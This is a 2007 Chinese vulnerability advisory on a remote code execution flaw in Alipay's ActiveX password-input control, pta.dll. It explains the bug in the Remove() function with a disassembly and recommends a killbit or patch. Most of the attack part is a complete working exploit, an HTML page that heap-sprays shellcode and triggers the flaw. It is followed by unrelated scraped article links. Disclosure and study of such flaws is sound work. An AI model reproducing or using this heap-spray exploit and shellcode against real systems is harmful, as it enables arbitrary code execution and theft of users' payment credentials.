阿里巴巴支付宝远程代码执行漏洞-0DAY

创建时间:2007-02-07
文章属性:原创
文章提交:cocoruder (frankruder_at_hotmail.com)

阿里巴巴支付宝远程代码执行漏洞

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net

Summary:

支付宝是由阿里巴巴公司出品的在线支付解决方案,在中国拥有众多用户,更多信息请参考:

https://www.alipay.com

在支付宝密码输入控件中存在一个远程代码执行漏洞,远程攻击者可利用此漏洞在被攻击者系统上执行任意代码,进而可安装木马以及间谍程序,窃取相关敏感信息比如淘宝帐号/密码,或者支付宝帐号/密码。

allyesno:补丁:http://img.alipay.com/download/1009/aliedit.exe

Affected Software Versions:

当前所有版本

Details:
    
    漏洞存在于由ActiveX控件"pta.dll"导出的"Remove()"函数中,相关信息如下:

InprocServer32:    pta.dll
    ClassID      :     66F50F46-70A0-4A05-BD5E-FBCC0F9641EC

[id(0x60030001), helpstring("method Remove")]
    void Remove([in] int idx);

直接看Remove()函数的处理流程:

.text:10003D4E ; Remove
    .text:10003D4E
    .text:10003D4E sub_10003D4E    proc near            ; DATA XREF: .rdata:1000B3A4o
    .text:10003D4E                            ; .rdata:1000B41Co ...
    .text:10003D4E
    .text:10003D4E arg_0           = dword ptr  4
    .text:10003D4E arg_4           = dword ptr  8
    .text:10003D4E
    .text:10003D4E                 mov     eax, [esp+arg_4]        
    .text:10003D52                 test    eax, eax
    .text:10003D54                 jl      short loc_10003D78    
    .text:10003D56                 push    esi
    .text:10003D57                 mov     esi, [esp+4+arg_0]    ; get idx
    .text:10003D5B                 shl     eax, 4            ; idx << 4
    .text:10003D5E                 add     eax, [esi+8]        ; [esi+8]=0
    .text:10003D61                 push    edi            ;
    .text:10003D62                 mov     edi, eax            ; idx << 4 ==>edi
    .text:10003D64                 mov     eax, [edi+8]        ; [(idx << 4)+8] ==>eax
    .text:10003D67                 push    eax
    .text:10003D68                 mov     ecx, [eax]        ; [[(idx << 4)+8]]==>ecx
    .text:10003D6A                 call    dword ptr [ecx+8]    ; [[[(idx << 4)+8]]+8]==>jmp addr
    .text:10003D6D                 push    edi
    .text:10003D6E                 lea     ecx, [esi+4]
    .text:10003D71                 call    sub_10003F35
    .text:10003D76                 pop     edi
    .text:10003D77                 pop     esi
    .text:10003D78
    .text:10003D78 loc_10003D78:                    ; CODE XREF: sub_10003D4E+6j
    .text:10003D78                 xor     eax, eax
    .text:10003D7A                 retn    8
    .text:10003D7A sub_10003D4E    endp

idx是我们可以控制的,因此可以完成有意思的攻击,比如我们设置的idx为0x41414141,程序会执行[[[14141410h+8]]+8]地址的代码。

Solution:

建议用户通过注册表对相应的CLSID设置Killbit,如不使用支付宝可到%system%/aliedit/目录下删除pta.dll

Disclosure Timeline:

2007.02.07        发布公告

allyesno:补丁:http://img.alipay.com/download/1008/aliedit.exe

Attached File:

这里给出一个用大内存分配实现的exp,把所有需访问其值的地址都置成0x0d0d0d0d,可以很好地达到攻击效果。
    警告:此exp只为展示此漏洞存在,请务用于其它用途。

/************************************************************************************************
Alipay ActiveX Remote Code Execute Exploit,enjoy it:)
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
*************************************************************************************************/

< html >
< head >
< OBJECT  ID ="com"  CLASSID ="CLSID:{66F50F46-70A0-4A05-BD5E-FBCC0F9641EC}" ></ OBJECT >
</ head >
< body >

< SCRIPT  language ="javascript" >

function  ClickForRunCalc()
{
     var  heapSprayToAddress  =   0x0d0d0d0d ;

var  payLoadCode  =  unescape( " %u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090 " + " %uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063 " );

var  heapBlockSize  =   0x400000 ;

var  payLoadSize  =  payLoadCode.length  *   2 ;

var  spraySlideSize  =  heapBlockSize  -  (payLoadSize + 0x38 );

var  spraySlide  =  unescape( " %u0d0d%u0d0d " );
    spraySlide  =  getSpraySlide(spraySlide,spraySlideSize);

heapBlocks  =  (heapSprayToAddress  -   0x400000 ) / heapBlockSize;

memory  =   new  Array();

for  (i = 0 ;i < heapBlocks;i ++ )
    {
        memory[i]  =  spraySlide  +  payLoadCode;
    }
    
    com.Remove( 0x00d0d0d0 );

function  getSpraySlide(spraySlide, spraySlideSize)
    {
         while  (spraySlide.length * 2 < spraySlideSize)
        {
            spraySlide  +=  spraySlide;
        }
        spraySlide  =  spraySlide.substring( 0 ,spraySlideSize / 2 );
         return  spraySlide;
    }

}
</ script >
< button  onclick ="javascript:ClickForRunCalc();" > ClickForRunCalc </ button >
</ body >
</ html >

【紧急通告】马云否认支付宝出现漏洞 淘宝大量用户现金被盗 今日支付宝强制升级补丁相关推荐

  1. 阿里:马云从未转让和退出淘宝股份 也没有这个打算

    雷帝网 乐天 1月7日报道 阿里巴巴集团今日发布声明,称阿里巴巴集团董事局主席马云从未转让和退出淘宝的股份.也没有这个打算. "这是任何公司管理过程中非常正常且普通的技术和法律层面操作.&q ...

  2. 马云做规矩: 到淘宝网上班要先学会倒立

    每个进入淘宝网工作的人,无论胖瘦.高矮,都必须在3个月内学会靠墙倒立.男性需保持倒立姿势超过三十秒才算过关,对女性的要求稍低些,十秒即可,否则只能卷铺盖走人.据说这则马云做下的规矩,最近在职场圈里流传 ...

  3. 淘宝APP用户行为数据分析案例(附python代码及注释)

    淘宝APP用户行为数据分析案例 一.分析背景与目的 1.1背景与数据限制 电商平台的最核心的功能就是为买卖双方提供高效和体验良好的交易服务.得益于算法技术的发展,淘宝APP给买方提供了搜索.推荐及广告 ...

  4. 淘宝/天猫店铺oAuth2.0接口:Taobao.user.seller.get 查询淘宝卖家用户信息接口接入说明

    淘宝/天猫店铺oAuth2.0接口:Taobao.user.seller.get 查询淘宝卖家用户信息接口接入说明: 为了进行电商平台淘宝的API开发,首先我们需要做下面几件事情: 1)开发者注册一个 ...

  5. 淘宝/天猫店铺oAuth2.0订单同步接口:Taobao.user.seller.get 查询淘宝卖家用户信息接口接入说明

    淘宝/天猫店铺oAuth2.0接口:Taobao.user.seller.get 查询淘宝卖家用户信息接口接入说明: 为了进行电商平台淘宝的API开发,首先我们需要做下面几件事情: 1)开发者注册一个 ...

  6. Spark商业案例与性能调优实战100课》第11课:商业案例之通过纯粹通过DataFrame分析大数据电影点评系仿QQ和微信、淘宝等用户群分析与实战

    Spark商业案例与性能调优实战100课>第11课:商业案例之通过纯粹通过DataFrame分析大数据电影点评系仿QQ和微信.淘宝等用户群分析与实战

  7. 淘宝APP用户行为数据分析(续用户行为分析文章)

    多年以来电子商务业务快速发展,尤其是移动客户端发展迅猛,移动互联网时代的到来让原本就方便快捷的网上购物变得更加便利,而淘宝作为国内最大的电商交易平台更是具有巨大的流量优势.淘宝APP的功能日益复杂,但 ...

  8. 淘宝技术发展3(Oracle/支付宝/旺旺)

    淘宝网作为个人网站发展的时间其实并不长,由于它太引人注目了,马云在2003年7月就宣布了这个是阿里巴巴旗下的网站,随后在市场上展开了很成功的运作. 最著名的就是利用中小网站来做广告,突围eBay在门户 ...

  9. OSChina 周六乱弹 ——马云要入房市,淘宝个房子?

    2019独角兽企业重金招聘Python工程师标准>>> Osc乱弹歌单(2017)请戳(这里) [今日歌曲] @clouddyy :#每日乱弹音乐#<回到过去>-周杰伦 ...

最新文章

  1. ios中的自动释放池
  2. 精选SpringBoot+Vue开发的开源系统(前端+后端+小程序)
  3. 一些NLP的面试问题
  4. HashMap和Hashtable及HashSet的区别
  5. 「AHOI / HNOI2018」转盘 解题报告
  6. [MySQL优化案例]系列 -- OPTIMIZE的威力
  7. java对象在内存中的布局
  8. 数据结构1800题-错题集-第四章
  9. python flask http 接口开发
  10. Linux——Ubuntu使用个给力的镜像,安装软件速度飞快
  11. 挖掘数百万参与的IMVU用户
  12. 利用mininet模拟SDN架构并进行DDoS攻击与防御模拟(Ryu+mininet+sflow+postman)
  13. ITK4.12+VS2015配置详解
  14. C++17类型std::variant介绍
  15. Elasticsearch-ais使用方式
  16. OpenSUSE 内核编译教程 (kernel 2.6.x)
  17. 【Spring Security】安全框架学习(十三)
  18. 与自己和解:做一些看似没用的事
  19. 【python-tips】非root权限安装pip、其他包
  20. 什么是实验室信息管理

热门文章

  1. 2021数模国赛B题
  2. Hive考试练习题(参考题解)
  3. Java服务端推送--SSE
  4. AI养猪,国标GB28181协议视频平台EasyGBS流媒体服务器携手RTMP流媒体服务器EasyDSS协同打造智慧养殖生态圈
  5. uniapp微信小程序服务器与行内img src图片路径拼接
  6. 大疆T30/T40 无人机总结
  7. DES加密和解密工具,可以对字符串进行加密和解密操作
  8. LIN 总线开发知识总结
  9. 锻炼 计网实践能力 的计划
  10. 设置左右上下对齐css,CSS上下左右居中